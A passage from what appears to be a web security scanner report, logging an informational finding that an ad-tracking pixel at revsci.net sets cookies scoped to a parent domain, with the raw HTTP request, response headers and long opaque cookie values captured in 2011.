RAZ+0hQgYKccNJz7v9V+EOMGL7V4Abb1dKuspshobubKBi8hd2/yS+k8VoZCwjCApdli3wI2qasZbzTdSaf7/raDI8Y6drB3Ij3WsAKvbNNsfyVntrJI1zhvLm05kGKkmetWKDR/eqjwBUVFDkvsceqV+bESPKRXo/z9wpGDxZjCjGtNv6VCiTlY1lDI0I6QVFoztx7o8dyJ69QuybDX2Ghi7PkN6o/MAiUNEQFMWfGiY9ljuRGflETVMPSVLZNryJEY1O+JAOCyM9odb66INjWIwngBxrXRwyHm019cjKiw1JRu40bKLiqMSv7ppbcvAuOxqVkjGBu3iAwb7zge3GtMVl8MMCBF8fdN7GZSd3TKlwRF19F06GqG5aO6R5/3mNvic5QgLlVW9tpmBAzvCqu82PGL4FJUoo/vFKmQy2Dvdr9c9oWSSfDLkBVw2XP1fH4RVLUIvBqVYXEVqGah5qQjf4UXpYdpYG8/427+t9Q8R3oUmYPWYcX4EtaolIxkU11BZknZ/2DkssktnvCSaIW8UkS9dcwLgjD6vPpVIVFWfVXFvcnCdJelEP/vebYpo5fA/zrfOy2H6KD6OvelcLn/sdS5eCg3TXNghK9K2a/MqlzbCkQq18dmkrNzT1h4JfmFz/crB0MvZJoKpq+qfmLhh3HR02zEllFZsdknBnvePQetrSqwAS94LaL+lRJypbcCuINZ8ilyErMl/tlV8E7Bm5vrjclMwOa9vyWMkE8XkfQPfjsk1bnSytW9SWoq7JK7rNFBGF2kw12faLPt84tv5HbBE/S/CUoZzUXxzq4NDKp1FUKTE3E7GRqxiPOPSiptFyED44bqpQjtLgZd54mygyaA==; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:21:25 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Mon, 13 Jun 2011 11:21:25 GMT

GIF89a.............!.......,...........D..;

12.110. http://pix04.revsci.net/G07610/b3/0/3/noscript.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/G07610/b3/0/3/noscript.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPFI0OheQIMVp94t6n7ILtKIEtdyqxPwaKhocXJX+1ZKic5njYIs9HYrq0bIzTlnSCIhQuWgZ0ja1WhQLXzC5PFsT1Y8FcytAHacXSpqQsYZvOkhZmA0aikEDJN/pB4U+02b3xP8vgx3+OZiCk0Kk2iIDPJDuHBy22YnoX+0zqQjPNkDNr266czIE0MGVX/Y/NxI48kH3sAASqKFs2KHe7Fc7HEqw8ECLQJKxkVyc5c5x181fEb6LdI3PaU+3R7UZxCTCIllviBz15aW3QJdVR0osHhipAn6PZ0JYN7/WQaeSiB0ceU65rBxgy7h4i4JavItPfDrcJMbt7ezfT2QmHU9hLg95V5OGzWMoOn+OAaAXRjiHYgJ04gRTQo2I2Gk7zZrHnNKWM9dfY7EBBLn93g1FoAFPv8A3nsr0bLcFfW4eQZ7Bfhb7ObvYMHX8w3MLoJx5Xvntl8AwmoAlw7WpK9BLG2BV50IdOU+TZnsizjLRcXLethY9ZCBCc7mVWMUJeWKt2ydTTi0RM3ygje51x96fCFqvjSU0VGFiIZXq9EHPrTO6astZwm4SM+DKiVxox9BRuYfXPHrsmzUZfxu5F0gT/G0GoLsGPXroGjY33lWdtVlCfIADDdBErp0tGTw/HcDe3dEj3QO7ZQM/JjI7DnkWHLBspvKKKy; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:25:45 GMT; Path=/
rtc_9kxA=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; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:25:45 GMT; Path=/
udm_0=MLv3NzMJZjpn3hc5wFS8IC+r63dQ4yV9iELcnt71VAcNP2TS4VlY4qSUGIOcGZlUB4SruQLl9XR5YWUgVeRUU77T0dB9naIjMHUteEdll6CqndD77KDwanYyeIPEsromGmlbIRKUEZS8jq4WxhsFj39udeAFFAknY9O3Tf4J3+kK705f7d7TOVG1VssiqLhWRKH8zB3RhDIGHZ8tevRe+ZcG+Tk9uXoVQNelb7K4ea6fuMFUkAPu8Pjr7YUal5o+TRzZj9/waTAca6i2pP7y+DrGqQJ442yc4kq2MARSn29yPdLLQaGxYVRsuQItBsfhjPjts+0YduGeKButufXSv9LYpMBuMJFS29bADyVNqa6cOaTxpvTZDPGWL61WPK0GBV/ewh6UyFmlzI+LcHSMjocG7Jts/iygOUJSrVWZygHqUtXHSFjSc76m9hY+gTAcVQNd1h2qv5b5xmjKRPMMB2vmOCBHBrPFEnnulNloRpx6IuUCwSQd5sQUNxbCpI7j/BCeLazR+m05XRiPCjAw/sLTpUL65WqpY7F8GkLz+azI+9ft/52THWJA0Ur6fXgFE3xvpgNd6hv13xC5WMsRpa5Vxv1Ney0PDTVjzuZPaHnnRGTTGLv9OAzLlkI/lvjbLO9cJJ/ZCoKwMDZwzDQMjFqQpUQwJHPPViweNNMPNSxRrf8NdCF7eY4IFn5MI0hukpZdP+mcCFO/9u5gzpGLuKQwXQ6WvTWKi+LOr+0H1rEJ+HRy/sTaSgPRzTf1vcEL9TmpK/6tQ5Tb0ENzqfVqrIes/Lv1c+cuPXd2aNrMJc6zQNbP8lgOSMdqftReq7X4LkuqQiW2womb6EnfPjUhLBWa4j32mzc+bMyM8r35es1O24x0W1POv/N3z63mno0VRICkl1ISeXy7l25e8FlFOF++cUQ6MAif5q49Tu3VzcqlhTQfBKAKMUxZqYDRpXbSqO/Lp1X9kRZfbvd4v0XoDpXmpKAYoIj8H9E3MZql03Qw6bhPivuDhTq5BruzECG4FTzkqRTpEdmL2eGV77DOx4wWGGvJpZ+Zpf0cndeNSsBbERulBkrtegdxjK6HgZJ6IB1ETlSzOLAezrrHyZxx+FWVvRbbvRY8j93s/aqVKkrLl+Jjtt/NsLVttpnoNn64gETVXp4q0FeBbHTixP2vr7GjDRviF9xcJSeCt5C5+BcSAOfhHxXQ0O6FJbTDYn33L9BexlXTvxpBPRoFoMWSSFUjtvxqHzhCqGuhdxOMUM/oAqP1UqkouPaSIhiyXov8mnO2vRxd3iG3/mZXbn7ocz976yf3pqw2FH7lIoeo8aREOVrVQGE53MCact/SOv0jXCjdyb5XW9mpBVgrSK2Jw9DEDWntbpoKb7bJY41tEe1a0QZHeb2HJfM1T4nXkqTkVir2Vt+kjxzNUkOK96OTA6Tcx9+YNSnc+IYwXsTPJ5oZocckG6NhFHW0puH3pDKCS1Tz6RmeF289+Q6dPSjIrDQOESfRRXah1JiGz6dr5+Slj9jMQ9ji0RwjXBosKA+hK9FYt9f8pFTLvV2tvAn9tszj4NSpcMqN+Uq1hF2OcCw1frrs6wl0ddNz7XGuoibEBQ4rvG/oYzzbYjU2t1QjL/XltVJFx/hM927IBi2S+Ha1IZzca/Yl8Gf8AoZSMFHxZZEsSNEncvVHQhezA5K/ty2OvHNtnWqUqsLJgHXPXM5bpxtI0O9vbu83KOYKuogOWLcCcrKhUu+pMkSh1FwNKcWITb+Dq1swWctNgQLNisE9il8Ax/tz; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:25:45 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /G07610/b3/0/3/noscript.gif?D=DM_LOC%3Dhttp%253A%252F%252Fbluekai.com%253FBK_EVT%253DMM_EXNF HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzUJZjpr3hc5wFS813GquQMtQrAqXr4DyJtMPyEMN2TS4VlY4qaUGoMGVAYaUgmDvwI5res2yCHqJwUpCl8bXI1x2wD2amdH8k/jmAEMGSOlVkBFtOHkIA6N1ceb/+CvvanugMzfmMxWWXiH+6F/8lLEaTCDxKBO/YXEqzX4Pi64WdCM+73ICL50mkePx5jppZKMzuvHQvSmzKdqHHrrktHJ7LGJATufSzktpJth5OLBEvqEdtzILZmKkac33pw9eJA0okhYvr3qEwAhbz8gJRIOqtT+5cjRdHKlimR/Zf93uEUDyKNOthtBPTpDfREoUp4+5xZWmQJB1g7Bxosyp7HtkUqHuuVgkejaqxCG/g0P7jfgEtR6yLJhEa1Mz7FcRqUGysjKJWzcg5bYZ/ah5Fad96qjRGwPmbnDK5pG67okplQUCPx11iN+fq6uDPiFmZyi0d8JFHm6/2xmN2F6CBXCK6nCSeag6hpLMYOrP3AuUlzqrT7U+Skck+w8glwHhLBLft6YDemqE7Xj0YSR6y4uerWSr2wDFEyV4QJzZ/f+aIOrMR+MkjPltiWeupGgUBrbVnlI24uQ8NgpQcaQKaAFcOoN3NIXqlndo6CvEMQnGhz7gC/JdhZoN7Wj/qpdMetXR/71M7dw3ZB7CuFbBcsMHprOAN3hCv3z/bsOsvah5chlzKYLwxCi8x5S6fQayhX7Wniskh5TCbKxZqXHH+QkNnIBee451U7u3RpQgE9T1SoYQ7zt0XqCh+TO9S2b4Mx54jZr0uA345XOjOU4v7nwrHmxWEA5L0F1MjsUmQnr3tclotWbW2w07LKBIo7yHjwliEDEm1pGvY+a+xfgHap83+GatrgN4ecSGRbCBFgCp+diviMKyrb0nXAwpNhKNkTwtiqdxn6jRuaSmQmu9WZeYV/AULKCZqkDldQFAQhnyVYu13NtRA/BR6BYbX7XsruYKzJ65hL/Vaisc52Il0CA9p8C3UjyqUD+M3O2IfGQZuo2tmWzjMz32TwvlxhESwu6XqR4oJPWtsvLJA1+T3RtNpAFkY6cd++fnc2AzOEeTu5kNwMVtlXikR8rGp9Pg9mwAzQjiMazwVr8v0V9JlbPx+CPllP7ni3ngUtRNGskfAGCc1hOSGLCJxqFvV1MmP4/aoZF6CEdwEEWtAaDLeeBC0kNj/wIEukEprxcgJda2HyyUZ8Hb3n5budHji3Z5USTlT4kELyS0IGH6x/OF7i4jeLIXokyAqHbH2pLeVL7YdRY925o6Xwxo0UorOxWbHFpgiOl1VCgM0O+0weuPSs4jnQ173hP1RYsBdNHJ7HfHDqStStYzQW297VlWqbgULKuXEdCMw2S0AcUlplKJlnmm+8ZiTNZjzyy7PXjlAXzN6v9a7hYqf71T83w1Vf7A//vmNJZ9E2jvUwnvKeU96Tfcz7HTvKmGvis9fi3yNpdVS8Y18CscOUtVKfM+90wLhHo3WeyA4KHZLCXCPmbHEPZI163kCeYdzAGCD4BaQaadnfR6iSrVDGXghSYibeYzhLdX8Y5DCfeLtpNegAnOiNZKbAXJtLJ7EMgKSRXOwK8sVTAXW6bYp+u7INAiKp0chr3RDWlxuB12F0rPA5Y3CezL56SO1BI4S9YU7JCwjBlwIv4QODoc3a1Mbd8YgQKTOkyY8DoLmcIIHLimis0ygM1Bcggp9AvBPj/jKrxx1EMICy1b5gp+NXuJfk9LHBh+rmfQt7otQ==; rsiPus_TcLI="MLsXtaMOZwhnJpGoWeqiOkhRBfJq5qBSuRPKlWnBpfgZQSo6yJttbu+GJyr/FnqFiBtOj0MMf0A1OS6DgqF3FRtvufvgyQjAvbavIAzG/mrl5fos0jzFySM3Fy31Ao7Ebh3uztX78jATDhVNx1WRMLmFpna/hMyk0AkQ+RGNw8/ja9DZvVCIoWOZ3zoWVkQWa3moHLdcLNNI+7fIXit9fQONqT14U1w0FPBb9cgsoqgd68j6eMttu34aVZu/d+fUj7isKrKe4cndCaLYExmogONnWhKh+J9f7TLfa6PH0tptHMuZOF1cSr7P5cqBLbvFUcWsfjeMCG/f8spHnxQXAL8nRRC1wzaJ8qPaqDjVHhxu4nIepmoRGgrkOH8O0vQt4286anvsGhDbVv0Nsb7OVX9U0Zc4Vf4dZQ5G2e5hrZb1bJHQdQqjasWp1Nt8jnucTB8b4Q/Jnb3Fh7j+L7FGpNU/zU1yNFDSuSB54znzG47c6DP+6kDji+6RZbnzpWRyVAOCeS9Yc/ZzuNxpSay+Bdpn0kqwIBqeBXERDx1Z7KLNfWn7HtNHpyWaP3I4DNsn8PrZK8b2Gjc0e14CZ245dGCAuQdwJbc6j2SUur9nDYW7cL6tvB5y1MH0cPCty0J2lEFcYTKXCPFsSIp3YAkS32MvvsdoLn1d/krkLg4zda0cMm9Kua59JbmSoXHIJItgIVnEP3SkX7dxYOd/DG7OAoG0I5wUUn+AJ4LRa5kU32nRHVwQaDILCW1VzY0B3lSS6Z9mSpIBHUhRv5gciu6tTOzoiB2kH3XA72pKyLVROk9D4KLucgAAB+ueIRn8wR69h5gPZ+lHiKjpmubSMQ3yV8dSjX1dVUDfUUrBDh8OjRz7WzfanDaDqoUrFKI6EHw1XnTDWLM2cnSFkfFaQgOC8YrZowqyhJMuuVpIx/ixqnDsx9kGIztW8Hi1FuloHNVNBQHIU4G6iJqwoVu6bNOwfNRqNvD/w4oqWtvXqCvuIikhh9wMSzTE0UZqd6ZfWwpbTH1MOPdJdcxX31rZx4qSHBpMhxoyszkjZj9YPfgAMrb86c7kpVdrUj4LxTZs6Z5o82umuiNWChLZ/DvN29RfpYYmRQ073p9Hc48NlMflrzKueAGPB93K3+o1eEBylETNrLYuNFB68oIWntcNDAZLIg2HcsY3N4iXyk2yPWxW6r+YoZUTnq+vo9ElytuK/Jp8W7p4jtG47jpY8kQXsYtu9C3HHcoqi2SdLX2w/VUwBs/3SU3CI25hLq/LU0izRT66MSrwujtCk2q6sM4M"; rsi_us_1000000="pUMlIymnMBYY1A2AKVt/X42sJFnhBIsVXupLmVgPalQSXetQt1elVlvt4Kw5pRsR+P7ZtkH37C+PV21OTgK2tSplzTgX1CmAikLsMGDiVOeyz9gzHAnSm372yh4tVHRxb8PeHhUHejBiiZxOkhaZ045oThXnSR8DAX6fYV/ybIiqulf+Pu3RMyR5oF+yDfrCk40UNg0Mp16XYh7mRSVM/HoY4oDuWAom4gnqrhPe3r+iQUB0j3q0tkwKlBzk/9MGM3R2hf6QFQcFA/Y0lx/KIqYkEDuXlq7lweOLDGfB2KHCGVGkzKMsPN9GFXv/RUyGxIOOHISzxTE3RILsCvsP9soypT8NSUHCAcVVr5WpVuc2vUOi5MgBmGqRNBKolDzTy9/FBYJrmOzpeSO58TchDb61tROKccLOkHuqT1Q1cveswkoS3BkggmAJjNfOnag0xP3yotFAiIv7586EVSdiV8c84zW0RkP0Ltu6foHuhK1+R29GukGI/oWg2BobCpX/IAzdzVQKwKcBRQ4Dgwjtb8LRAPdEqwOSyrmF3oGNQaA0L+897x8nXL3Plyo1+OjxoEKVJ2EzmHkURDIYKyDLfZRA28hnB+UGj8LF9DhdnAYoQ6V2zOBqn6vO+BaB9czT3Pyzhw2zAuBWx+Jz5M1ht4XwlNIFhQpBD9DiYjy8+M6kL8fYMJ5ChzfLzauc4bc2f10QzIGJ/TOEQiJNgm/UYCPJimT8yavPrnQz1SwuiFKZxBHp4f29XKyXF0iX7bCrt6AOTgiss8wuNC3a/3aM/IgHRcWu3038LNW/sm7n7Gd0W4h5H72gd766m8rkC/YH8RRqsnZyX5R5wcPZLFUAJqEAOeZZjinbq/rgpxkp/x2CQ+hkPVNW2EjnMU77XaSR8pvN/HxrRF+AnH5BJ8USrrubV2etFGYmz1q0uLrxDphjCAN+lUd4NH5My9BwokFQvEeslMNVT42zlFkwpCZNLBWaUW9ajxJHkf7O1TOfSkcjuaQbwzei/zcbbxVZEzsH5nUPYbmnVGb97Da4oyNNuelVVMt7+XASLKnLONiHv3IGdI0yDuFGyHvA+QZ3g3pUbwU3ChTe2w4iMgYE0rwZZf5LpNds2gECG3zZAfbjF3KG1FCIoCjdAzYh5g5ZbWQ2jN011jYnH4ecXHdn3ceT0SJQNyxMoAA71+f1pYIn+9aH4Bk3tHrq9laUX4l9wgNgjSti9ZxOhSzb7g2fHqqygqPvS+aX0Pm0oEGQldpEekjZsQfiKBNyX/DneA7f/CypSSCNtaDDsonnfNSpBklcNi4bY/t0n2Z5WK0HCdRBJuqZJ8Nrg1tm82nxWLHf/M8k/d0VjYDc/FvxEWvtX3ZM+/++gC+QdS4Uz7JQ0KQ/Jpdh1/+8IfDEnme0rmuBVl25YTq1S32n1Z5cXUfq+9KOylWqlBE0S6zQkXZQBgIxgYl3ZoFdvE6/jtVyuh5jdSAjrzg4JebjZ774LSV6xP+redbMdzWAjZALUH23JsqOMGz8Hq/WqWP/X2IvHbrcv2IvRQyCPVRlh20+ZlqrihQ3tB/Zbzm9mE7B8DV3UXi/T4wHXgbFaAJzX5UKgpBX2CW7TkqyPtmhtZQOnfGFBneT+Vy/8uhXjkWSTt1QSpmXhydn5vcDkVl88gffwl8Ztr8ZGAiHJGpCuraCuZwkZGZ07gO81Q+Sht1LHglUiz5IlGk="; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JSW/NgBmorjQ0ubO+NOVEqMB7SuDqPkIcMw8sszVJiJmSU53IMPd9F9D7kL7x5PWnPsjT8JPMm0oKsLImQRiDIeeoJyRQAQXa1fXueAOxG/0Ph9A4kA2XsDoDZ3nH70SxSOgmLnV5piixzk5resys4dVLm8jlJvGgV2s7kZE5qeMl7fkSUtHy2u5XniqjHIgyt5UffgnxoZaXmXVF2Rx0nAk4ABNCfTkpvx8yrAl5EVSN9Y/ulDlbMHB4QhrzJWNaiN/UTN91SPy0A0xeGq1h3ZPSNN+uN2hodnKE4tvK5XvcxwhYjg8y8BWMde8JrZtD8AKgNrPGGFoXENRIzAYk5jG5SSNgeRa4SWgwFuIXM0sSa/jH5tJIIcY6TkD8KrvaxX0+tYl7q3ISynOsMisqw+xIoRJLbN6keHwZN9VVPAReIXPqRGfyuaKMvZ4o4t6o6oDkBLC064KgMzczLHDaNB2Sk03O/LbbJrxuaBEzEwa+Lenpnj9zA3iLqnWSNb7+gXvpydQAXl/xSXeX9rsi0fGiRKF8BB2zziWbFGtgQ3dBNAiHx9wSNYID9H6KYhUuLjayOlZmkbM4f3B9yp4a3MhRkwQ4MJn6p9IGCQ==; rtc_mCtf=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; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_mCtf=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_uJev=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_M4Zd=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_eC0O=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_PWQ_=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_LA6t=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
